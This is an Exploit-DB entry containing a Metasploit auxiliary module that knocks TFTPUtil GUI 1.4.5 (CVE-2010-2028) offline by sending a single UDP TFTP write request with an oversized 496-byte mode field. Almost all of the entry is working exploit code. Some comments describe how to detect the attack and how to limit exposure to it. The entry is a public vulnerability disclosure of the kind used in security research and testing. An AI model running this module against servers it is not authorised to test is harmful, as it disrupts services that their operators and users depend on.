TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)

Author: Jeremiah Talamantes
type: dos
platform: windows
port: 
date_added: 2010-05-07  
date_updated:   
verified: 1  
codes: OSVDB-64888;CVE-2010-2028  
tags: Metasploit Framework (MSF)  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comTFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe  

raw file: 12530.rb  
# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow
# EDB-ID: 12482
# CVE-ID: (CVE-2010-2028)
# OSVDB-ID: (OSVDB-64888)
# Author: Jeremiah Talamantes
# Published: 2010-05-02
# Verified: yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
#
# TFTPGUI v1.4.5 Long Transport Mode Overflow
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 5/2/2010
#
#
# |~Greetz to Devin @ infointox.net~|
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##

require 'msf/core'

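# Auxiliary DoS module for TFTPUtil GUI (TFTPGUI) 1.4.5, tracked as
# CVE-2010-2028 / OSVDB-64888.
#
# The module sends a single TFTP write request (opcode 2) over UDP whose
# transfer-mode field is 496 bytes long. RFC 1350 defines only the modes
# "netascii", "octet" and "mail", so a request whose mode string is not one
# of those (or is far longer than them) is a reliable anomaly signal for
# network detection. Restricting UDP/69 to trusted hosts limits exposure.
class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Udp
	include Msf::Auxiliary::Dos

	# Registers module metadata and the default target port (UDP 69).
	#
	# @param info [Hash] metadata overrides merged in by update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TFTPGUI v1.4.5 Long Transport Mode Overflow',
			'Description'    => %q{
				The TFTPUtil GUI server version 1.4.5 can be
				DOSed by sending a specially crafted request. Discovered by
				Jeremiah Talamantes at RedTeam Security.
				Greetz to Devin @ infointox.net.
			},
			'Author'         => 'Jeremiah Talamantes (RedTeam Security)',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					# Identifiers let scanners and reports correlate this module
					# with the advisory instead of relying on URLs alone.
					[ 'CVE', '2010-2028' ],
					[ 'OSVDB', '64888' ],
					[ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'],
					[ 'URL', 'http://www.exploit-db.com/exploits/12482'],
					[ 'URL', 'https://www.securityfocus.com/bid/39872'],
				],
			'DisclosureDate' => 'May 02 2010'))

		register_options([Opt::RPORT(69)])
	end

	# Builds the request and sends it once to the configured host and port.
	#
	# Packet layout: opcode (0x0002) | filename | NUL | mode | NUL.
	# Locals replace the original globals ($fn, $md, $stuff) so nothing leaks
	# into the framework's shared namespace, and the socket is released even
	# when the send raises.
	def run
		connect_udp
		begin
			print_status("Sending naughty request...")
			filename = "A"
			mode     = "A" * 496
			request  = "\x00\x02" + filename + "\0" + mode + "\0"
			udp_sock.put(request)
		ensure
			disconnect_udp
		end
	end
end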